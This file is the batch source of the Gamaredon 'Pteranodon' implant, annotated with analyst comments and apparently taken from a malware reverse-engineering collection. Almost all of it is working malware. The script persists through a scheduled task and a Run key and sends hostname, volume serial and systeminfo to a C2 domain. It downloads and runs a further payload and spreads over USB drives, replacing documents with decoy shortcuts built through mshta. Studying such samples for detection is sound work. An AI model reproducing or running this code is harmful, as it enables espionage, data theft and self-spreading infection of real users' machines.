Malware-Misc-RE/2019-04-13-Gamaredon-Group-Pteranodon-Implant-$1_c.01.cmd
| REM @VK_Intel | |
| REM MD5: 7ac3a99fb79ec2143900afa73c47b243 | |
| REM Self-extractable executable | |
| REM Analyst notes: the REM lines that follow describe observed behaviour and the artefacts each stage leaves behind | |
| @echo off | |
| setlocal ENABLEDELAYEDEXPANSION | |
| REM in batch everything after the equals sign belongs to the value, so the inline REM text on the vers, telotroyan and chromus lines is part of the assigned value - presumably added during annotation, the original values were likely plain | |
| set vers=%1_c.01 REM implant version | |
| set ver=%vers% | |
| REM updata is the file name fetched as a second stage in the updat section | |
| set updata=%1.tmp | |
| REM caps on how many decoy lnk files are planted per directory on a removable drive, consumed by firstaction and actions | |
| set /a maxword=10 | |
| set /a maxword1=10 | |
| set /a maxtxt=10 | |
| set /a maxjpg=10 | |
| REM files is the local copy of the dropper, written by prosesstron from the parent process executable | |
| set files=zoom.exe | |
| REM telotroyan is the file name under which the dropper copy is planted on removable drives | |
| set telotroyan=bootstat.dat REM trojan body - bootst | |
| REM chromus is used as scheduled task name, Run value name and exe name for persistence | |
| set chromus=OfficePlugin REM masked as OfficePlugin | |
| REM URL http://updates-spreadwork.pw | |
| REM set domenus1=http:// | |
| REM set domenus2=updates- | |
| REM set domenus3=spreadwork.pw | |
| REM copies the parent process executable to zoom.exe, see prosesstron | |
| call :prosesstron %files% | |
| REM ping of localhost, presumably used as a short delay | |
| ping 127.0.0.1 | |
| REM parse the ver output down to major.minor of the Windows version | |
| For /F "Tokens=2 Delims=[]" %%i In ('ver') Do ( | |
| For /F "Tokens=2,3 Delims=. " %%a In ("%%i") Do Set versions=%%a.%%b | |
| ) | |
| REM 5.1 is Windows XP, which takes the xpos branch | |
| If "%versions%"=="5.1" goto xpos | |
| REM other hosts: install under APPDATA and schedule the task every 10 minutes with force | |
| set chromusdir=%APPDATA%\Microsoft\Office\Plugin | |
| set param222=/SC MINUTE /MO 10 /F | |
| goto viber | |
| :xpos | |
| REM Windows XP branch: install under WINDIR instead of APPDATA and run the scheduled task as SYSTEM | |
| set chromusdir=%WINDIR%\Microsoft\Office\Plugin | |
| set param222=/SC MINUTE /MO 10 /RU "SYSTEM" | |
| goto viber | |
| :viber | |
| REM plant the dropper copy as OfficePlugin.exe in chromusdir and clear any staged tmp update | |
| if not exist "%chromusdir%\*.*" MD "%chromusdir%" | |
| copy "%files%" "%chromusdir%\%chromus%.exe" /y | |
| del /f /q "%chromusdir%\*.tmp" | |
| REM persistence 1: a scheduled task named OfficePlugin, created only when the query fails | |
| schtasks /Query /tn %chromus% | |
| if errorlevel 1 ( | |
| schtasks /Create %param222% /tn %chromus% /tr "%chromusdir%\%chromus%.exe" | |
| ) | |
| REM persistence 2: an OfficePlugin value under the HKCU Policies Explorer Run key - the ERRORLEVEL tested is that of Find, so the value is added when the expected path is not already present | |
| REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v %chromus% | Find "%chromusdir%\%chromus%.exe" | |
| If %ERRORLEVEL% == 1 ( | |
| reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v %chromus% /t REG_EXPAND_SZ /d "%chromusdir%\%chromus%.exe" /f | |
| ) | |
| :spread | |
| REM nabor is the alphabet and long the length of the random name that writePwd produces | |
| setlocal enabledelayedexpansion | |
| set nabor=qQwWeErRtTyYuUiIoOpPaAsSdDfFgGhHjJkKlLzZxXcCvVbBnNmM1234567890 | |
| set long=15 | |
| REM writes a 15 character random name into downlist.txt, later read as the name of the downloaded response | |
| call :writePwd downlist.txt | |
| setlocal enableextensions enabledelayedexpansion | |
| REM connectivity check: a TTL= line in the ping output means online and continues at otsetup, otherwise the host goes straight to the removable drive stage at capiton | |
| ping 8.8.8.8 |>nul find /i "TTL=" &&goto otsetup||goto capiton | |
| :otsetup | |
| REM ImagingDevices.exe is the download helper invoked in the metka section with wget-like --post-data, -q, -N and -O options | |
| taskkill /f /im ImagingDevices.exe | |
| setlocal enabledelayedexpansion | |
| REM exports a scheduled task named StateBinDLL as XML and keeps the line holding its command in statebin.ini | |
| schtasks /Query /TN StateBinDLL /XML | find /i "command" > "%CD%\statebin.ini" | |
| for %%i in ("%CD%\statebin.ini") do ( | |
| if %%~zi==0 ( | |
| REM no such task: the reported version is tagged NO_DLLS | |
| set ver=NO_DLLS-%ver% | |
| goto metka | |
| ) | |
| ) | |
| REM slices 15 leading and 10 trailing characters off the line, presumably the surrounding XML tags, leaving the command path in tmps | |
| set /p x=<"%CD%\statebin.ini" | |
| set /p "x=%x:~15,-10%"<nul >"%CD%\statebin.ini" | |
| set /p tmps=<"%CD%\statebin.ini" | |
| REM when the task command is rundll32.exe the Arguments line is parsed instead, see updll2 | |
| if %tmps%==rundll32.exe goto updll2 | |
| :updll | |
| REM if the path extracted from the StateBinDLL task is missing on disk the version is tagged NO_DLLS | |
| if not exist "%tmps%" (set ver=NO_DLLS-%ver%) | |
| :metka | |
| REM victim fingerprint: the volume serial of C: with the dash removed | |
| For /F "Tokens=4*" %%B In ('vol c:') Do set updates=%%B | |
| if errorlevel 1 set updates=00000-00000 | |
| set comments=%updates:-=% | |
| REM systeminfo output is flattened into one string with +### as line separator and sent in the beacon | |
| systeminfo /FO TABLE /NH > system.ini | |
| FOR /F "tokens=*" %%i IN (system.ini) do @IF NOT X%%i==X set infosys=!infosys!%%i+### | |
| REM host identifier is computername_serial with spaces removed | |
| set IDs=%computername%_%comments% | |
| set IDs=%IDs: =% | |
| setlocal | |
| set ID=0 | |
| REM enumerates removable drives via WMIC DriveType 2, TestDisk sets USB to the drive letter and ID to its serial | |
| For /F "Tokens=1,2* Delims==" %%i In ('WMIC LogicalDisk Where ^(DriveType^=2 And MediaType^=NULL^) Get Name^,VolumeSerialNumber /Value^|Find "="') Do Call :TestDisk %%i %%j | |
| set flashid=%ID% | |
| if %ID%==0 set flashid=000000 | |
| REM appears to be a stray line: cmd would most likely try to run it as a command and report it as not recognised | |
| http://updates-spreadwork.pw | |
| REM C2 address assembled from three parts, presumably to avoid a plain string match on the domain | |
| set domenus1=http:// | |
| set domenus2=updates- | |
| set domenus3=spreadwork.pw | |
| REM beacon: POSTs versiya, comp, id, sysinfo and fid to the C2 and saves the response under the random name read from downlist.txt | |
| set /p down=<downlist.txt | |
| ImagingDevices.exe --post-data="versiya=%ver%&comp=%computername%&id=%IDs%&sysinfo=%infosys%&fid=%flashid%" "%domenus1%%domenus2%%domenus3%" -q -N %domenus1%%domenus2%%domenus3% -O %down% | |
| REM response dispatch by size: empty goes to capiton, up to 30000 bytes is treated as an update pointer at updat, anything larger is started as an executable | |
| for %%i in (%down%) do (set /a size=%%~Zi) | |
| if %size%==0 goto capiton | |
| if %size% LEQ 30000 goto updat | |
| start /b %down%.exe | |
| goto capiton | |
| :updat | |
| REM small response: its first line is used as a URL base, the updata file is fetched from there, staged as OfficePlugin.tmp in chromusdir and an external kill.cmd, not part of this listing, is invoked with the install directory and name | |
| set /p zagr=<%down% | |
| If %ERRORLEVEL% == 0 ( | |
| ImagingDevices.exe "%zagr%/%updata%" | |
| copy "%updata%" "%chromusdir%\%chromus%.tmp" /y | |
| call kill.cmd %chromusdir% %chromus% | |
| ) | |
| :capiton | |
| REM removable drive stage: re-enumerate drives and leave for outlog when none is present or readable | |
| setlocal | |
| set ID=0 | |
| For /F "Tokens=1,2* Delims==" %%i In ('WMIC LogicalDisk Where ^(DriveType^=2 And MediaType^=NULL^) Get Name^,VolumeSerialNumber /Value^|Find "="') Do Call :TestDisk %%i %%j | |
| if %ID%==0 goto outlog | |
| If Not Exist %USB% goto outlog | |
| if not exist %USB%\* goto outlog | |
| REM a marker file named after the drive serial in chromusdir records drives already seeded, ZarFlash handles a drive seen for the first time | |
| If Not Exist "%chromusdir%\%ID%.usb" call :ZarFlash | |
| REM a hidden Recycle folder on the drive receives the originals of documents that are replaced by decoy lnk files | |
| set papka=Recycle | |
| set directors=%USB%\%papka% | |
| If Not Exist %directors% ( | |
| MD %directors% | |
| attrib +h %directors% | |
| ) | |
| REM Explorer settings written under HKCU: Hidden set to 2 and HideFileExt set to 0, presumably so hidden items stay hidden while extensions are shown and a decoy named document.doc.lnk displays as document.doc - both registry writes are detection points | |
| REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden | Find "0x2" | |
| If %ERRORLEVEL% == 1 ( | |
| reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v Hidden /t REG_DWORD /d 00000002 /f | |
| ) | |
| REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt | Find "0x0" | |
| If %ERRORLEVEL% == 1 ( | |
| reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v HideFileExt /t REG_DWORD /d 00000000 /f | |
| ) | |
| setlocal enabledelayedexpansion | |
| REM unhides everything on the drive, then overwrites a fixed list of system-looking file names and every exe on the drive with the dropper copy and hides the former | |
| attrib -h "%USB%\*.*" /s | |
| for %%F in (disk.inf pagefile.sys ntuser.ini disk.trashinfo boot.sys win.ini usb.ini ntuser.log ntuser.sys bootstat.dat) do ( | |
| for /f "Tokens=1* Delims=" %%a in ('dir /b/s %USB%\%%F') do ( | |
| copy "%files%" "%%a" /y | |
| attrib +h "%%a" | |
| ) | |
| ) | |
| for /f "Tokens=1* Delims=" %%r in ('dir /b/s "%USB%\*.exe"') do (copy "%files%" "%%r" /y) | |
| ) | |
| REM existing doc.lnk, docx.lnk, txt.lnk and jpg.lnk files on the drive are refreshed via delsrashlnks, then doubled lnk.lnk names are renamed back | |
| set rashirenie=doc.lnk | |
| call :delsrashlnks %rashirenie% %USB% | |
| set rashirenie=docx.lnk | |
| call :delsrashlnks %rashirenie% %USB% | |
| set rashirenie=txt.lnk | |
| call :delsrashlnks %rashirenie% %USB% | |
| set rashirenie=jpg.lnk | |
| call :delsrashlnks %rashirenie% %USB% | |
| for /f "Tokens=1* delims=" %%g in ('dir /b/s "%USB%\*.lnk.lnk"') do (ren "%%g" "%%~ng") | |
| REM a dropper copy named bootstat.dat is placed in the directory of every lnk on the drive | |
| for /f "Tokens=1* Delims=" %%r in ('dir /b/s "%USB%\*.lnk"') do (copy "%files%" "%%~dpr%telotroyan%" /y) | |
| REM decoy icon source: wordicon.exe from the Installer folder when present, otherwise SHELL32.dll with indexes 1, 70 and 302 - firstaction then walks every subdirectory for the given extension, the global values rash, pred and LINKS carry the parameters | |
| for /f "Tokens=1* Delims=" %%K in ('dir /s /b %SystemRoot%\Installer\wordicon.exe') do ( | |
| set LINKS=%%K | |
| ) | |
| if not defined LINKS set LINKS=%SystemRoot%\system32\SHELL32.dll | |
| set ico=1 | |
| set rash=doc | |
| set /a pred=%maxword% | |
| call :firstaction %ico% %rash% %pred% %USB% | |
| for /f "Tokens=1* Delims=" %%K in ('dir /s /b %SystemRoot%\Installer\wordicon.exe') do ( | |
| set LINKS=%%K | |
| ) | |
| if not defined LINKS set LINKS=%SystemRoot%\system32\SHELL32.dll | |
| set ico=1 | |
| set rash=docx | |
| set /a pred=%maxword% | |
| call :firstaction %ico% %rash% %pred% %USB% | |
| set LINKS=%SystemRoot%\system32\SHELL32.dll | |
| set /a ico=70 | |
| set rash=txt | |
| set /a pred=%maxtxt% | |
| call :firstaction %ico% %rash% %pred% %USB% | |
| set LINKS=%SystemRoot%\system32\SHELL32.dll | |
| set /a ico=302 | |
| set rash=jpg | |
| set /a pred=%maxjpg% | |
| call :firstaction %ico% %rash% %pred% %USB% | |
| for /f "Tokens=1* Delims=" %%K in ('dir /s /b %SystemRoot%\Installer\wordicon.exe') do ( | |
| set LINKS=%%K | |
| ) | |
| if not defined LINKS set LINKS=%SystemRoot%\system32\SHELL32.dll | |
| set ico=1 | |
| set rash=doc | |
| set /a pred=%maxword1% | |
| REM same decoy pass for doc files in the drive root: num counts the lnk files already there and actions is called for the second doc found, as in firstaction | |
| set i=0 | |
| set num=0 | |
| set flashdirectors=%USB% | |
| for %%j in ("!flashdirectors!\*.lnk") do (set /a num+=1) | |
| for %%f in ("!flashdirectors!\*.doc") do ( | |
| set /a i+=1 | |
| if /I !num! LEQ %pred% ( | |
| if /I !i! == 2 (call :actions "%%f" !num! %pred% "!flashdirectors!\" %rash% "%LINKS%") | |
| ) | |
| ) | |
| REM second pass placing bootstat.dat next to every lnk, then hide all planted copies | |
| for /f "Tokens=1* Delims=" %%r in ('dir /b/s "%USB%\*.lnk"') do (copy "%files%" "%%~dpr%telotroyan%" /y) | |
| attrib +h %USB%\%telotroyan% /s | |
| attrib +h %%directors%% | |
| :outlog | |
| REM cleanup: kill the mshta instances used for lnk creation, remove empty directories under TEMP and delete everything in the current directory, where zoom.exe, downlist.txt, statebin.ini and system.ini were written | |
| taskkill /f /im mshta.exe | |
| for /r "%TEMP%" %%d in (.) do dir /b "%%~d" | find /v "">nul || rd /s /q "%%~d" | |
| del /f /q "%CD%\*.*" | |
| exit | |
| :firstaction | |
| REM for every subdirectory of the drive: count the lnk files already present, skip the Recycle folder, and hand the second file with extension rash to actions while the lnk count is within pred - rash, pred and LINKS are read as globals, the call arguments themselves are not used here | |
| REM when the directory is the Recycle folder flashdirectors keeps its previous value, so the loop body still runs against that earlier directory | |
| for /f "delims=" %%d in ('dir /b/s/ad "%USB%"') do ( | |
| set i=0 | |
| set num=0 | |
| for %%j in ("%%d\*.lnk") do (set /a num+=1) | |
| if /i not %%d==%directors% set flashdirectors=%%d | |
| for %%f in ("!flashdirectors!\*.%rash%") do ( | |
| set /a i+=1 | |
| if /I !num! LEQ %pred% ( | |
| if /I !i! == 2 (call :actions "%%f" !num! %pred% "!flashdirectors!\" %rash% "%LINKS%") | |
| ) | |
| ) | |
| ) | |
| EXIT /B | |
| :actions | |
| REM decoy creation for one document: code page 1251 is Windows Cyrillic | |
| chcp 1251 >nul | |
| if /I !num! GEQ %pred% (exit /B) | |
| REM the original is moved into the hidden Recycle folder under a random FILE name | |
| set RAN=%RANDOM% | |
| copy /y "%~1" "%directors%\FILE%RAN%.%rash%" | |
| REM the lnk argument string opens the moved document via cmd, then unhides and starts bootstat.dat in the same directory | |
| set starts=\%papka%\FILE%RAN%.%rash% | |
| set startfill="/C %starts% & attrib -h %telotroyan% & start %telotroyan%" | |
| copy %files% "!flashdirectors!\%telotroyan%" /y | |
| REM the lnk is written by mshta running inline vbscript: target is comspec, window style 7 is minimised, icon from LINKS and ico - detection: mshta with a vbscript:Execute argument and lnk files whose target is cmd with attrib -h and start in the arguments | |
| start /b mshta.exe vbscript:Execute("Set x=CreateObject(""WScript.Shell"").CreateShortcut(""%~1.lnk""):x.TargetPath=""%comspec%"":x.Arguments="%startfill%":x.WindowStyle=7:x.IconLocation=""%LINKS%, %ico%"":x.Save():Close()") | |
| REM the original document is deleted, leaving only the lnk with the document name | |
| del /f /q "%~1" | |
| EXIT /B | |
| :TestDisk | |
| REM called once per WMIC key=value line: stores each key as a dollar-prefixed variable and, on the VolumeSerialNumber row, copies the drive Name into USB and the serial into ID | |
| Set $%1=%2 | |
| If %1==VolumeSerialNumber If Defined $%1 (Set USB=%$Name%& Set ID=%$VolumeSerialNumber%) | |
| EXIT /B | |
| :ZarFlash | |
| REM first seeding of a drive: dropper copy at the root as bootstat.dat, hidden at the end | |
| copy %files% "%USB%\%telotroyan%" /y | |
| REM a root lnk named after the current date, icon SHELL32 index 3, whose target opens explorer.exe and then unhides and starts bootstat.dat | |
| set LINKS=%SystemRoot%\system32\SHELL32.dll | |
| set ico=3 | |
| set lnkfiles="/C %windir%\explorer.exe & attrib -h %telotroyan% & start %telotroyan%" | |
| start /b mshta.exe vbscript:Execute("Set x=CreateObject(""WScript.Shell"").CreateShortcut(""%USB%\%date%.lnk""):x.TargetPath=""%comspec%"":x.Arguments="%lnkfiles%":x.WindowStyle=7:x.IconLocation=""%LINKS%, %ico%"":x.Save():Close()") | |
| REM empty marker file named after the drive serial in chromusdir, checked by capiton so the drive is not seeded twice | |
| cd.>"%chromusdir%\%ID%.usb" | |
| attrib +h "%USB%\%telotroyan%" | |
| EXIT /B | |
| :prosesstron | |
| REM locates the executable of the parent process and copies it to files - consistent with the self-extracting dropper header, the parent is presumably the dropper itself | |
| setlocal ENABLEDELAYEDEXPANSION | |
| set read=0 | |
| REM mn is this script file name, matched against each process command line | |
| set mn=%~nx0 | |
| REM relies on WMIC printing CommandLine before ParentProcessId for each process: the CommandLine row containing mn sets read, and the next ParentProcessId row is captured as prntid | |
| for /f "usebackq tokens=1* delims==" %%A IN (`wmic process get parentprocessid^, commandline /value`) DO ( | |
| if "!read!"=="1" ( | |
| if "%%A"=="ParentProcessId" (set prntid=%%B) | |
| ) | |
| if "%%A"=="CommandLine" ( | |
| set cmdln=%%B | |
| if not "!cmdln:%mn%=!"=="!cmdln!" ( | |
| set read=1 | |
| ) else ( | |
| set read=0 | |
| ) | |
| ) | |
| ) | |
| SET /a pid=%prntid% | |
| REM maps the pid back to an image name by fixed column offsets in tasklist output | |
| FOR /f "skip=3delims=" %%a IN ('tasklist') DO ( | |
| SET "found=%%a" | |
| SET /a foundpid=!found:~26,8! | |
| SET /a foundpid=!found:~26,8! | |
| IF %pid%==!foundpid! set ParentName=!found:~0,24%! | |
| ) | |
| REM strips the column padding, resolves the image to its full path via WMIC and copies that file to zoom.exe | |
| set "ProcName=%ParentName: =%" | |
| for /f "tokens=1* delims==" %%i in (' | |
| wmic process where "Name='%ProcName%'" get ExecutablePath /value^| findstr : | |
| ') do set ExecutablePath=%%j | |
| copy "%ExecutablePath%" "%files%" /y | |
| EXIT /B | |
| :delsrashlnks | |
| REM for every file on the drive ending in rashirenie, e.g. doc.lnk, xcopy overwrites it from a local file of that same name in the current directory - that local file is not part of this listing | |
| for /f "Tokens=1* Delims=" %%r in ('dir /b/s "%USB%\*.!rashirenie!"') do ( | |
| xcopy /d /q /y "%rashirenie%" "%%r" | |
| ) | |
| EXIT /B | |
| :updll2 | |
| REM rundll32 case: the Arguments line of the StateBinDLL task XML is kept instead of the command, sliced at offsets 17 and -10, then processing continues at updll | |
| schtasks /Query /TN StateBinDLL /XML | find /i "arguments" > "%CD%\statebin.ini" | |
| set /p y=<"%CD%\statebin.ini" | |
| set /p "y=%y:~17,-10%"<nul >"%CD%\statebin.ini" | |
| set /p tmps=<"%CD%\statebin.ini" | |
| goto updll | |
| :writePwd | |
| REM appends a random string of long characters, each drawn from nabor by getRandS, to the file named by the first argument | |
| set Pwd= | |
| for /L %%A IN (1,1,%long%) DO ( | |
| call :getRandS | |
| set Pwd=!Pwd!!rands! | |
| ) | |
| echo.%Pwd%>>"%~1" | |
| exit /b | |
| :getRandS | |
| REM picks one character of nabor at a random index from 0 to 61 and returns it in rands | |
| set /a RandKey=%RANDOM% %% 62 | |
| set rands=!nabor:~%RandKey%,1! | |
| exit /b | |